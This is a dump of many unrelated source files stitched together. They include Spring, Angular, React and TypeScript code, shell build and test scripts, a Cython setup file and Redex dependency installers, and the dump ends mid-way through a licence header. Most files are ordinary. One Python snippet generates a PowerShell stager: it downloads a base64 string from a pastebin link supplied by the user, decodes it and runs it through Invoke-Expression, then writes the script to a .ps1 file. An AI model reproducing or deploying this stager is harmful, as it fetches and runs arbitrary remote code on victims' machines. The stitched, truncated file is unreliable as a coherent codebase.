@ComponentScan("com.datafari.ranking")
@PropertySource("classpath:config.properties")
public class ConfigProperties {
// Connection settings injected from config.properties on the classpath.
@Value("${cassandraHost}")
private String cassandraHost;
@Value("${zkHost}")
private String zkHost;
@Value("${zkPort}")
private String zkPort;
@Inject
private ApplicationContext context;
// Spark context wired to the configured Cassandra host.
@Bean
public ISparkContextProvider sparkContextProvider(){
return new SparkContextProviderImpl(cassandraHost);
}
// Solr client built on top of the Spark context bean and ZooKeeper address.
@Bean
public ISolrClientProvider solrClientProvider() throws IOException{
return new SolrClientProviderImpl(context.getBean(ISparkContextProvider.class), zkHost, zkPort);
}
// Must be static so it is instantiated before regular beans and can resolve
// the ${...} placeholders used by the @Value fields above.
@Bean
public static PropertySourcesPlaceholderConfigurer propertySourcesPlaceholderConfigurer() {
return new PropertySourcesPlaceholderConfigurer();
}
}
#!/bin/bash
# A little bit of scripting magic so that whatever directory this script is
# run from, we always find the python scripts and data we need.
cd "$(dirname "$0")"
cwd=`pwd`/..
cd ${cwd}

# Activate python virtual environment
source ../../../../virtualenv/bin/activate

# Now do some work
mkdir -p ../../../output_data/cannon

# Photometric colour expressions passed to every Cannon run.
COLOUR_EXPRESSIONS="photometry_GROUND_JOHNSON_B-photometry_GROUND_JOHNSON_V,photometry_GROUND_JOHNSON_V-photometry_GROUND_COUSINS_R"

# run_group <index> <extra labels>
#
# Runs the four Cannon tests for one abundance (or abundance pair) appended
# to the core labels Teff,logg,[Fe/H]: HRS, LRS, then censored HRS and
# censored LRS -- the same invocations, in the same order, as the previously
# hand-expanded command blocks. <index> keeps the original output file
# numbering (00..10).
run_group() {
    local index="$1"
    local extra_labels="$2"
    local labels="Teff,logg,[Fe/H],${extra_labels}"
    local mode MODE

    # Uncensored runs (HRS then LRS).
    for mode in hrs lrs; do
        MODE=$(echo "${mode}" | tr '[:lower:]' '[:upper:]')
        python3 cannon_test.py --train "galah_training_sample_4fs_${mode}[SNR=250]" \
                               --test "galah_test_sample_4fs_${mode}" \
                               --description "4MOST ${MODE} - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
                               --labels "${labels}" \
                               --label-expressions "${COLOUR_EXPRESSIONS}" \
                               --output-file "../../../output_data/cannon/cannon_galah_${mode}_individual_${index}"
    done

    # Censored runs (HRS then LRS), restricted to the published line list.
    for mode in hrs lrs; do
        MODE=$(echo "${mode}" | tr '[:lower:]' '[:upper:]')
        python3 cannon_test.py --train "galah_training_sample_4fs_${mode}[SNR=250]" \
                               --test "galah_test_sample_4fs_${mode}" \
                               --censor "line_list_filter_2016MNRAS.461.2174R.txt" \
                               --description "4MOST ${MODE} (censored) - 5+n labels - Train on 0.25 GALAH. Test on 0.75 GALAH." \
                               --labels "${labels}" \
                               --label-expressions "${COLOUR_EXPRESSIONS}" \
                               --output-file "../../../output_data/cannon/cannon_galah_censored_${mode}_individual_${index}"
    done
}

# -----------------------------------------------------------------------------------------
# One group per abundance; indices preserve the original output file names.
run_group 00 "[Ca/H]"
run_group 01 "[Mg/H]"
run_group 02 "[Ti/H]"
run_group 03 "[Si/H]"
run_group 04 "[Na/H]"
run_group 05 "[Ni/H]"
run_group 06 "[Cr/H]"
run_group 07 "[Ba/H]"
run_group 08 "[Eu/H]"
run_group 09 "[Li/H]"
run_group 10 "[C/H],[O/H]"
# -----------------------------------------------------------------------------------------
|
#!/bin/sh
# Extract detached code signatures from a signed macOS .app bundle.
#
# The bundle is signed in place with the caller-supplied codesign arguments,
# then for every signed Mach-O binary the embedded signature blob is carved
# out (location/size reported by pagestuff), and every CodeResources file is
# preserved verbatim. The result is archived so it can later be re-applied
# to an unsigned build of the same bundle.
set -e
ROOTDIR=dist
BUNDLE=${ROOTDIR}/ALMEX-Qt.app
CODESIGN=codesign
TEMPDIR=sign.temp
TEMPLIST=${TEMPDIR}/signatures.txt
OUT=signature.tar.gz
if [ -z "$1" ]; then
    echo "usage: $0 <codesign args>"
    echo "example: $0 -s MyIdentity"
    exit 1
fi
rm -rf ${TEMPDIR}
mkdir -p ${TEMPDIR}
# --file-list records every file codesign touched, one absolute path per line.
${CODESIGN} -f --file-list ${TEMPLIST} "$@" "${BUNDLE}"
# Mach-O binaries: carve out the signature blob of each signed file.
# `while read -r` keeps paths containing spaces intact; the previous
# `for i in \`grep ...\`` form word-split them.
grep -v CodeResources ${TEMPLIST} | while IFS= read -r i; do
    # Path of the file relative to the bundle root.
    TARGETFILE="${BUNDLE}/$(echo "${i}" | sed "s|.*${BUNDLE}/||")"
    # pagestuff -p lists load segments; the last entry is the signature.
    SIZE=$(pagestuff "$i" -p | tail -2 | grep size | sed 's/[^0-9]*//g')
    OFFSET=$(pagestuff "$i" -p | tail -2 | grep offset | sed 's/[^0-9]*//g')
    SIGNFILE="${TEMPDIR}/${TARGETFILE}.sign"
    mkdir -p "$(dirname "${SIGNFILE}")"
    echo "Adding detached signature for: ${TARGETFILE}. Size: ${SIZE}. Offset: ${OFFSET}"
    # Copy exactly the signature bytes out of the binary.
    dd if="$i" of="${SIGNFILE}" bs=1 skip="${OFFSET}" count="${SIZE}" 2>/dev/null
done
# CodeResources property lists are copied whole.
grep CodeResources ${TEMPLIST} | while IFS= read -r i; do
    TARGETFILE="${BUNDLE}/$(echo "${i}" | sed "s|.*${BUNDLE}/||")"
    RESOURCE="${TEMPDIR}/${TARGETFILE}"
    mkdir -p "$(dirname "${RESOURCE}")"
    echo "Adding resource for: ${TARGETFILE}"
    cp "${i}" "${RESOURCE}"
done
# Remove the manifest before archiving so it does not end up in the tarball.
rm ${TEMPLIST}
tar -C ${TEMPDIR} -czf ${OUT} .
rm -rf ${TEMPDIR}
echo "Created ${OUT}"
|
#!/bin/bash
set -e # Exit with nonzero exit code if anything fails

# Rebuild the ./generated content tree from the checked-in sources.
rm -rf ./generated
mkdir -p ./generated/loaders ./generated/plugins
cp -rf ./src/content/loaders/ ./generated/loaders
cp -rf ./src/content/plugins/ ./generated/plugins

fetchPackages() {
  # Loader READMEs: webpack-contrib plus a few externally maintained loaders.
  node ./src/scripts/fetch_packages.js "webpack-contrib" "-loader" "README.md" "./generated/loaders"
  node ./src/scripts/fetch_packages.js "babel" "babel-loader" "README.md" "./generated/loaders"
  node ./src/scripts/fetch_packages.js "postcss" "postcss-loader" "README.md" "./generated/loaders"
  node ./src/scripts/fetch_packages.js "peerigon" "extract-loader" "README.md" "./generated/loaders"

  # Plugin READMEs from webpack-contrib.
  node ./src/scripts/fetch_packages.js "webpack-contrib" "-webpack-plugin" "README.md" "./generated/plugins"
  node ./src/scripts/fetch_packages.js "webpack-contrib" "-extract-plugin" "README.md" "./generated/plugins"

  # Drop deprecated/archived plugin repositories from the output.
  rm ./generated/plugins/component-webpack-plugin.json ./generated/plugins/component-webpack-plugin.md
}

# NOTE(review): on Travis, TRAVIS_PULL_REQUEST is the string "false" for push
# builds, so this fetch only fires when the variable is unset entirely (e.g.
# local runs) — confirm that is the intended behaviour.
if [ "$TRAVIS_PULL_REQUEST" = "" ]; then
  fetchPackages
else
  echo "PR running, not fetching packages."
fi

# Fetch sponsors and backers from opencollective
node ./src/scripts/fetch_supporters.js

# Fetch starter kits
node ./src/scripts/fetch_starter_kits.js
|
<html>
<head>
  <title>Signup Form</title>
</head>
<body>
  <!-- POST keeps the credentials out of the URL, browser history and
       server access logs (the previous form defaulted to GET). -->
  <form action="/action_page.php" method="post">
    <label for="username">Username:</label><br>
    <input type="text" id="username" name="username" placeholder="Enter your username"><br>
    <label for="email">Email:</label><br>
    <!-- type="email" enables built-in browser validation of the address. -->
    <input type="email" id="email" name="email" placeholder="Enter your email"><br>
    <label for="password">Password:</label><br>
    <input type="password" id="password" name="password" placeholder="Enter your password"><br><br>
    <input type="submit" value="Sign Up">
  </form>
</body>
</html>
<filename>lang/py/rfc/06/page.py
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# Demonstrate how a closure defers evaluation (lazy evaluation).
try:
    # Python 2 location of urlopen.
    from urllib import urlopen
except ImportError:  # Python 3 moved it to urllib.request.
    from urllib.request import urlopen


def page(url):
    """Return a thunk that lazily fetches and returns the body of ``url``.

    The closure captures ``url``; no network I/O happens until the
    returned callable is invoked.
    """
    def get():
        return urlopen(url).read()
    return get
|
require 'rails_helper'
# Controller spec for the downloads index page.
RSpec.describe DownloadsController, type: :controller do
  describe '#index' do
    # Lazily performs the request; evaluated when `is_expected` is used.
    subject { get :index }

    # NOTE(review): this example reads `response` without invoking `subject`,
    # so the request may never actually be issued before the status is
    # checked — confirm it exercises the controller as intended.
    it { expect(response.status).to eq(200) }
    it { is_expected.to render_template(:index) }
    # Shared examples defined elsewhere (IP allow-listing behaviour).
    it_behaves_like 'disallows untrusted ips'
  end
end
|
<filename>src/app/app.router.ts
import { ModuleWithProviders } from '@angular/core';
import { Routes, RouterModule } from '@angular/router';
import AppComponent from './app.component';
import MainPageComponent from './main-page/main-page.component';
import TrendingComponent from './trending/trending.component';
import SignInComponent from './sign-in/sign-in.component';
import RegisterComponent from './register/register.component';
import NewsPageComponent from './news-page/news-page.component';
import SettingsComponent from './settings/settings.component';
import ManageComponent from './manage/manage.component';
import PostsComponent from './manage/posts/posts.component';
import AddPostComponent from './manage/add-post/add-post.component';
import EditPostComponent from './manage/edit-post/edit-post.component';
import CategoriesComponent from './manage/categories/categories.component';
import AddTagComponent from './manage/add-tag/add-tag.component';
import CommentsViewComponent from './manage/comments-view/comments-view.component';
import UsersComponent from './manage/users/users.component';
// Application route table.
//
// The previous configuration declared `{ path: '', redirectTo: '/',
// pathMatch: 'full' }` ahead of the MainPageComponent entry: a full-match
// redirect from '' to '/' resolves straight back to the empty path, so the
// redirect pointed at itself and shadowed the main-page route. Serving
// MainPageComponent directly on the empty path (with pathMatch: 'full')
// removes the self-redirect.
export const router: Routes = [
  { path: '', component: MainPageComponent, pathMatch: 'full' },
  { path: 'trending', component: TrendingComponent },
  { path: 'sign-in', component: SignInComponent },
  { path: 'register', component: RegisterComponent },
  { path: 'news/:id/:slug', component: NewsPageComponent },
  {
    path: 'manage',
    component: ManageComponent,
    children: [
      // Default child view: the posts list.
      { path: '', redirectTo: 'posts', pathMatch: 'full' },
      { path: 'posts', component: PostsComponent },
      { path: 'edit-post/:id', component: EditPostComponent },
      { path: 'add-post', component: AddPostComponent },
      { path: 'tags', component: CategoriesComponent },
      { path: 'add-tag', component: AddTagComponent },
      { path: 'comments', component: CommentsViewComponent },
      { path: 'users', component: UsersComponent },
    ],
  },
  { path: 'settings', component: SettingsComponent },
];

// Root router module, consumed by the AppModule imports array.
export const routes: ModuleWithProviders = RouterModule.forRoot(router);
|
#!/usr/bin/env bash
set -e

# ---------------------------------------------------------------------------
# ANSI colour codes used by the logging helpers below.
# ---------------------------------------------------------------------------
BLU='\033[0;34m'
YLW='\033[0;33m'
GRN='\033[0;32m'
RED='\033[0;31m'
NOC='\033[0m' # No Color

# Coloured logging helpers. Each prints its message wrapped in the colour
# escape codes above; echo_error additionally aborts the script.
echo_info()           { printf "\n${BLU}%s${NOC}" "$1"; }
echo_step()           { printf "\n${BLU}>>>>>>> %s${NOC}\n" "$1"; }
echo_sub_step()       { printf "\n${BLU}>>> %s${NOC}\n" "$1"; }
echo_step_completed() { printf "${GRN} [✔]${NOC}"; }
echo_success()        { printf "\n${GRN}%s${NOC}\n" "$1"; }
echo_warn()           { printf "\n${YLW}%s${NOC}" "$1"; }
echo_error()          { printf "\n${RED}%s${NOC}" "$1"; exit 1; }
# ------------------------------
# Repository root, resolved relative to this script's own location.
projectdir="$(cd "$(dirname "${BASH_SOURCE[0]}")"/../.. && pwd)"
# get the build environment variables from the special build.vars target in the main makefile
# (exports e.g. BUILD_REGISTRY, PROJECT_NAME, KIND, KUBECTL, HELM3).
eval $(make --no-print-directory -C ${projectdir} build.vars)
SAFEHOSTARCH="${SAFEHOSTARCH:-amd64}"
BUILD_IMAGE="${BUILD_REGISTRY}/${PROJECT_NAME}-${SAFEHOSTARCH}"
# Chart version as stamped by the build into _output/version.
helm_tag="$(cat ${projectdir}/_output/version)"
CROSSPLANE_IMAGE="upbound/${PROJECT_NAME}:${helm_tag}"
K8S_CLUSTER="${K8S_CLUSTER:-${BUILD_REGISTRY}-inttests}"
CROSSPLANE_NAMESPACE="crossplane-system"
# cleanup on exit
# Set skipcleanup=true to keep the kind cluster around for debugging.
if [ "$skipcleanup" != true ]; then
  function cleanup() {
    echo_step "Cleaning up..."
    export KUBECONFIG=
    "${KIND}" delete cluster --name="${K8S_CLUSTER}"
  }
  trap cleanup EXIT
fi
echo_step "creating k8s cluster using kind"
"${KIND}" create cluster --name="${K8S_CLUSTER}"
# tag crossplane image and load it to kind cluster
docker tag "${BUILD_IMAGE}" "${CROSSPLANE_IMAGE}"
"${KIND}" load docker-image "${CROSSPLANE_IMAGE}" --name="${K8S_CLUSTER}"
echo_step "installing helm package(s) into \"${CROSSPLANE_NAMESPACE}\" namespace"
# We removed helm.mk since we don't need/want to publish helm charts. However,
# we lost templating functionality from values.yaml.tmpl which is handled with
# the following lines instead.
cp "${projectdir}/cluster/charts/${PROJECT_NAME}/values.yaml.tmpl" "${projectdir}/cluster/charts/${PROJECT_NAME}/values.yaml"
# NOTE(review): `sed -i -e` without a backup suffix is GNU-style; BSD/macOS
# sed would create a stray "values.yaml-e" file — confirm CI runs on Linux.
sed -i -e "s|%%VERSION%%|${helm_tag}|g" "${projectdir}/cluster/charts/${PROJECT_NAME}/values.yaml"
"${KUBECTL}" create ns "${CROSSPLANE_NAMESPACE}"
# Two replicas each with pullPolicy Never so only the kind-loaded image is used.
"${HELM3}" install "${PROJECT_NAME}" --namespace "${CROSSPLANE_NAMESPACE}" "${projectdir}/cluster/charts/${PROJECT_NAME}" --set replicas=2,rbacManager.replicas=2,image.pullPolicy=Never,imagePullSecrets=''
echo_step "waiting for deployment ${PROJECT_NAME} rollout to finish"
"${KUBECTL}" -n "${CROSSPLANE_NAMESPACE}" rollout status "deploy/${PROJECT_NAME}" --timeout=2m
echo_step "wait until the pods are up and running"
"${KUBECTL}" -n "${CROSSPLANE_NAMESPACE}" wait --for=condition=Ready pods --all --timeout=1m
# ----------- integration tests
echo_step "------------------------------ INTEGRATION TESTS"
echo
echo_step "check for necessary deployment statuses"
echo
echo -------- deployments
"${KUBECTL}" -n "${CROSSPLANE_NAMESPACE}" get deployments
MUST_HAVE_DEPLOYMENTS="crossplane crossplane-rbac-manager"
for name in $MUST_HAVE_DEPLOYMENTS; do
    echo_sub_step "inspecting deployment '${name}'"
    dep_stat=$("${KUBECTL}" -n "${CROSSPLANE_NAMESPACE}" get deployments/"${name}")
    echo_info "check if is deployed"
    # Run the pipeline directly: the old `if $( ... )` form executed grep's
    # (empty) *output* and only worked by accident of bash's exit-status
    # rules for empty commands.
    if echo "$dep_stat" | grep -iq 'No resources found'; then
        echo "is not deployed"
        # exit takes 0-255; `exit -1` is invalid in POSIX shells.
        exit 1
    else
        echo_step_completed
    fi
    echo_info "check if is ready"
    # READY column looks like "2/2"; split into current/desired counts.
    IFS='/' read -ra ready_status_parts <<<"$(echo "$dep_stat" | awk ' FNR > 1 {print $2}')"
    if ((${ready_status_parts[0]} < ${ready_status_parts[1]})); then
        echo "is not Ready"
        exit 1
    else
        echo_step_completed
    fi
    echo
done
echo_step "check for pods statuses"
# Poll the pods five times, five seconds apart, to catch crash-looping pods.
for ((i = 1; i <= 5; i++)); do
    echo_sub_step "pod check #$i"
    echo
    echo "-------- pods"
    pods=$("${KUBECTL}" -n "${CROSSPLANE_NAMESPACE}" get pods)
    echo "$pods"
    while read -r pod_stat; do
        name=$(echo "$pod_stat" | awk '{print $1}')
        echo_sub_step "inspecting pod '${name}'"
        echo_info "check if is ready"
        IFS='/' read -ra ready_status_parts <<<"$(echo "$pod_stat" | awk '{print $2}')"
        if ((${ready_status_parts[0]} < ${ready_status_parts[1]})); then
            echo_error "is not ready"
            exit 1
        else
            echo_step_completed
        fi
        echo_info "check if is running"
        # grep -v succeeds when the STATUS column is anything but Running.
        if echo "$pod_stat" | awk '{print $3}' | grep -ivq 'Running'; then
            echo_error "is not running"
            exit 1
        else
            echo_step_completed
        fi
        echo_info "check if has restarts"
        if (($(echo "$pod_stat" | awk '{print $4}') > 0)); then
            echo_error "has restarts"
            exit 1
        else
            echo_step_completed
        fi
        echo
    done <<<"$(echo "$pods" | awk 'FNR>1')"
    sleep 5
done
echo_success "Integration tests succeeded!"
|
<filename>src/router.js
import React from 'react';
import { Router, Route, Switch } from 'dva/router';
import dynamic from 'dva/dynamic';
import IndexPage from './routes/IndexPage';
function RouterConfig({ app, history }) {
return (
<Router history={history}>
<Switch>
<Route path="/" exact component={IndexPage} />
<Route path='/home' exact component={dynamic({
app,
component: () => import('./routes/Home'),
models: () => [
import('./models/home'),
],
})} />
</Switch>
</Router>
);
}
export default RouterConfig;
|
<gh_stars>0
/*
* Copyright © 2019 <NAME>, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
import React from 'react';
import data from './sample_response';
import {
parseRelations,
makeTargetNodes,
} from 'components/FieldLevelLineage/v2/Context/FllContextHelper';
// Shape of a single node in the field-level lineage graph.
interface INode {
  id: string;
  name: string;
  group: number; // grouping key — presumably used for layout/coloring; TODO confirm against consumers
}

// Context carrying the lineage graph state. The empty-object default is only
// a placeholder; meaningful values come from <Provider> below.
const FllContext = React.createContext({});
// Parse both lineage directions of a backend response into tables, nodes and
// links, relative to the target dataset's namespace.
function getFieldsAndLinks(d) {
  const namespace = d.entityId.namespace;
  const incoming = parseRelations(namespace, d.incoming);
  const outgoing = parseRelations(namespace, d.outgoing, false);

  return {
    causeTables: incoming.tables,
    impactTables: outgoing.tables,
    nodes: [...incoming.relNodes, ...outgoing.relNodes],
    links: [...incoming.relLinks, ...outgoing.relLinks],
  };
}
// Provides the lineage graph state, built from the bundled sample response.
export function Provider({ children }) {
  const parsedRes = getFieldsAndLinks(data);
  const defaultState = {
    target: data.entityId.dataset,
    // Nodes for the target dataset's own fields.
    targetFields: makeTargetNodes(data.entityId.dataset, data.fields) as INode[],
    nodes: parsedRes.nodes,
    links: parsedRes.links,
    causeSets: parsedRes.causeTables,
    impactSets: parsedRes.impactTables,
    activeField: null,
    // NOTE(review): these look like pagination seeds (4 tables per view,
    // 1-based first indices) — confirm semantics against the consuming view.
    numTables: 4,
    firstCause: 1,
    firstImpact: 1,
    firstField: 1,
  };
  return <FllContext.Provider value={defaultState}>{children}</FllContext.Provider>;
}
// Render-prop access to the lineage context, so callers need not import
// FllContext directly.
export function Consumer({ children }) {
  return <FllContext.Consumer>{children}</FllContext.Consumer>;
}
|
onedata = str('&wc = new-object System.Net.WebClient\n\n$wc.DownloadString("http://pastebin.com/raw/MLpLWsgW") | out-file c:\Windows\\temp\henneko.txt\n\n$File = Get-Content -Path "C:\Windows\Temp\henneko.txt"\n\nWrite-Host $File\n\n$enc = [System.Text.Encoding]::UTF8\n$string = $enc.GetString([System.Convert]::FromBase64String($File))\n\nWrite-Host $string\n\nInvoke-Expression -Command "$string"')
link = str(input("Link a usar de pastebin en base 64: "))
print (onedata.replace("http://pastebin.com/raw/MLpLWsgW", link))
import sys
sys.stdout=open("hennekogetdepastepython.ps1","w")
print (onedata.replace("http://pastebin.com/raw/MLpLWsgW", link))
sys.stdout.close()
f= open("hennekogetdepastepython.ps1","w+")
f.write(onedata.replace("http://pastebin.com/raw/MLpLWsgW", link))
f.close() |
# Build script that compiles Cython sources into C extension modules.
# https://medium.com/@xpl/protecting-python-sources-using-cython-dcd940bb188e
import setuptools  # important: import before distutils so setuptools patches its commands
from distutils.core import Extension, setup
from Cython.Build import cythonize
from Cython.Distutils import build_ext
#cimport numpy as np
import numpy

# define an extension that will be cythonized and compiled
extensions = [
    Extension(
        name="gff",  # importable name of the compiled module
        sources=["GraphTree.pyx"],
        # libraries=[],
        #library_dirs=["/usr/local/lib/","/usr/lib"],
        language="c",
        # numpy headers are required to compile code using the numpy C API
        include_dirs=[numpy.get_include()]
    ),
    #and other extension
    # Extension(name="csegmentation", sources=["CSegmentation.pyx"],
    #           library_dirs=["/usr/local/lib/","/usr/lib"],
    #           extra_compile_args = ["-I/usr/include/igraph -L/usr/include/lib -ligraph"],
    #           extra_link_args = ["-I/usr/include/igraph -L/usr/include/lib -ligraph"],
    #           language="c++"),
]

setup(
    name = 'GFF',
    # Cython's build_ext knows how to compile .pyx sources
    cmdclass = {'build_ext': build_ext},
    ext_modules=cythonize(extensions)
)
#!/usr/bin/env bash
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.

# Set-up the dependencies necessary to build and run Redex on Ubuntu 16.04
# Xenial, using APT for software management.

# Exit on any command failing
set -e

# Root directory of repository
ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")" >/dev/null 2>&1 && pwd)"

# Temporary directory for toolchain sources. Build artifacts will be
# installed to /usr/local.
TMP=$(mktemp -d 2>/dev/null)
# Remove the scratch directory on exit, success or failure.
trap 'rm -r $TMP' EXIT

# Boost dev packages taken from APT on releases where they are new enough;
# older releases build Boost from source instead (see the case statements).
BOOST_DEB_UBUNTU_PKGS="libboost-filesystem-dev
libboost-iostreams-dev
libboost-program-options-dev
libboost-regex-dev
libboost-system-dev
libboost-thread-dev"
# Download, build, and install CPython 3.6.10 from source (into /usr/local,
# the default configure prefix).
# NOTE(review): the pushd calls are never popped, so the cwd is left inside
# $TMP afterwards; subsequent pushd targets are absolute, so this is benign.
function install_python36_from_source {
  pushd "$TMP"
  wget https://www.python.org/ftp/python/3.6.10/Python-3.6.10.tgz
  tar -xvf Python-3.6.10.tgz

  pushd Python-3.6.10
  ./configure
  make && make install
}
# Build Boost from source via the repository's helper script, working in the
# scratch directory.
function install_boost_from_source {
  pushd "$TMP"
  "$ROOT"/get_boost.sh
}
# Install the base build dependencies via APT. Any arguments are appended as
# extra package names ($* joins them into the package list).
function install_from_apt {
  PKGS="autoconf
autoconf-archive
automake
binutils-dev
bzip2
ca-certificates
g++
libiberty-dev
libjemalloc-dev
libjsoncpp-dev
liblz4-dev
liblzma-dev
libtool
make
wget
zlib1g-dev $*"
  apt-get update
  # ${PKGS} is intentionally unquoted: it must word-split into packages.
  apt-get install --no-install-recommends -y ${PKGS}
}
# Install dependencies appropriate for a given Debian version ($1).
function handle_debian {
  case $1 in
    [1-9])
      # Single-digit (<= 9) releases are not supported.
      echo "Unsupported Debian version $1"
      exit 1
      ;;
    10)
      # Debian 10: build Boost from source instead of taking it from APT.
      install_from_apt python3
      install_boost_from_source
      ;;
    *)
      # Newer releases: Boost from APT is acceptable.
      install_from_apt ${BOOST_DEB_UBUNTU_PKGS} python3
      ;;
  esac
}
# Install dependencies appropriate for a given Ubuntu version ($1).
function handle_ubuntu {
  case $1 in
    16*)
      # 16.x: needs Python 3.6 and Boost built from source.
      install_from_apt
      install_python36_from_source
      install_boost_from_source
      ;;
    1[7-9]*)
      # 17.x-19.x: APT python3 is fine; Boost still from source.
      install_from_apt python3
      install_boost_from_source
      ;;
    2*)
      # 20.x and later: everything from APT, including Boost.
      install_from_apt ${BOOST_DEB_UBUNTU_PKGS} python3
      ;;
    *)
      echo "Unsupported Ubuntu version $1"
      exit 1
      ;;
  esac
}
# Read ID and VERSION_ID from /etc/os-release.
# `declare $(...)` re-evaluates the matched KEY=VALUE lines as variable
# assignments in this shell.
declare $(grep -E '^(ID|VERSION_ID)=' /etc/os-release | xargs)

# Dispatch on the distribution; each handler decides per-version details.
case $ID in
  ubuntu)
    handle_ubuntu "$VERSION_ID"
    ;;
  debian)
    handle_debian "$VERSION_ID"
    ;;
  *)
    echo "Unsupported OS $ID - $VERSION_ID"
    exit 1
esac
import { Point } from './AffinaMatrix';
/**
 * A square drawing surface mapping logical (mathematical) coordinates onto a
 * canvas rectangle: a cell grid plus X/Y axes through the center, with the
 * Y axis pointing up.
 */
export default class BoundaryPlate {
  x: number; // canvas-space top-left corner
  y: number;
  width: number; // canvas-space extent of the plate
  height: number;
  gridSize: number; // number of cells per side
  pixelSizeX: number; // size of one grid cell, in canvas pixels
  pixelSizeY: number;
  centerX: number; // canvas coordinates of the logical origin
  centerY: number;

  constructor(x: number, y: number, width: number, height: number, gridSize: number) {
    this.x = x;
    this.y = y;
    this.width = width;
    this.height = height;
    this.gridSize = gridSize;
    this.pixelSizeX = width / gridSize;
    this.pixelSizeY = height / gridSize;
    this.centerX = x + width / 2;
    this.centerY = y + height / 2;
  }

  /** Change grid resolution and recompute cell sizes; no-op when unchanged. */
  setGridSize(size: number) {
    if (this.gridSize === size) return;
    this.gridSize = size;
    this.pixelSizeX = this.width / this.gridSize;
    this.pixelSizeY = this.height / this.gridSize;
  }

  /** Render the full plate: background grid, then axes on top. */
  draw(ctx: CanvasRenderingContext2D): void {
    this.drawGrid(ctx);
    this.drawAxis(ctx);
  }

  /** Stroke the gridSize x gridSize background cells. */
  private drawGrid(ctx: CanvasRenderingContext2D) {
    ctx.save();
    ctx.strokeStyle = '#aaa';
    // FIX: the previous destructuring pulled x, y, width, height but the loop
    // read this.x/this.y directly, leaving all four locals unused.
    const { x, y } = this;
    for (let i = 0; i < this.gridSize; i++) {
      for (let j = 0; j < this.gridSize; j++) {
        ctx.strokeRect(x + i * this.pixelSizeX, y + j * this.pixelSizeY, this.pixelSizeX, this.pixelSizeY);
      }
    }
    ctx.restore();
  }

  /** Draw the X and Y axes through the plate center, with arrowheads. */
  private drawAxis(ctx: CanvasRenderingContext2D) {
    ctx.save();
    ctx.strokeStyle = '#000';
    const { x, y, width, height } = this;
    // Arrowhead proportions are tied to the cell size so they scale with the grid.
    const arrowHeight = this.pixelSizeY / 1.5;
    const arrowWidth = this.pixelSizeX / 4;
    // X axis (rightward arrow)
    ctx.beginPath();
    ctx.moveTo(x, y + height / 2);
    ctx.lineTo(x + width, y + height / 2);
    ctx.moveTo(x + width, y + height / 2);
    ctx.lineTo(x + width - arrowHeight, y + height / 2 - arrowWidth);
    ctx.moveTo(x + width, y + height / 2);
    ctx.lineTo(x + width - arrowHeight, y + height / 2 + arrowWidth);
    // Y axis (upward arrow)
    ctx.moveTo(x + width / 2, y);
    ctx.lineTo(x + width / 2, y + height);
    ctx.moveTo(x + width / 2, y);
    ctx.lineTo(x + width / 2 - arrowWidth, y + arrowHeight);
    ctx.moveTo(x + width / 2, y);
    ctx.lineTo(x + width / 2 + arrowWidth, y + arrowHeight);
    ctx.stroke();
    ctx.restore();
  }

  /** Map a logical point to canvas coordinates (logical +y maps to canvas -y). */
  getCoord(p: Point): Point {
    return new Point(
      this.centerX + (p.x * this.pixelSizeX),
      this.centerY + (-p.y * this.pixelSizeY)
    );
  }

  /** Stroke a line segment given in logical coordinates. */
  drawLine(ctx: CanvasRenderingContext2D, xFrom: number, yFrom: number, xTo: number, yTo: number) {
    const xy1: Point = this.getCoord(new Point(xFrom, yFrom));
    const xy2: Point = this.getCoord(new Point(xTo, yTo));
    ctx.beginPath();
    ctx.moveTo(xy1.x, xy1.y);
    ctx.lineTo(xy2.x, xy2.y);
    ctx.stroke();
  }

  /** Stroke a closed quadrilateral given in logical coordinates. */
  drawParalelogram(ctx: CanvasRenderingContext2D, t: Paralelogram) {
    const a: Point = this.getCoord(t.p1);
    const b: Point = this.getCoord(t.p2);
    const c: Point = this.getCoord(t.p3);
    const d: Point = this.getCoord(t.p4);
    ctx.beginPath();
    ctx.moveTo(a.x, a.y);
    ctx.lineTo(b.x, b.y);
    ctx.lineTo(c.x, c.y);
    ctx.lineTo(d.x, d.y);
    ctx.lineTo(a.x, a.y); // close back to the first corner
    ctx.stroke();
  }
}
/** Four corners of a quadrilateral, stored in drawing order. */
export class Paralelogram {
  // Parameter properties declare and assign the public fields in one step;
  // the constructor signature and resulting instance shape are unchanged.
  constructor(
    public p1: Point,
    public p2: Point,
    public p3: Point,
    public p4: Point,
  ) {}
}
|
#!/bin/bash
# Runs gitlab-ci locally
# For some reason there isn't a convenient command for running
# all jobs in the proper order (build -> test), hence this script.
set -e
for t in buster focal stretch bionic bullseye
do
  # FIX: the original used `|| ( echo ...; exit 1 )`; `exit` inside a subshell
  # cannot terminate this script and only worked indirectly via `set -e`.
  # A brace group runs in the current shell, making the abort explicit.
  gitlab-ci-multi-runner exec shell "build:$t" && gitlab-ci-multi-runner exec shell "test:$t" || {
    rc=$?
    echo "stop @ $t, exit=$rc"
    exit 1
  }
done
|
<gh_stars>0
package org.hisp.dhis.importexport.xml;
/*
* Copyright (c) 2004-2005, University of Oslo
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* * Neither the name of the <ORGANIZATION> nor the names of its contributors may
* be used to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
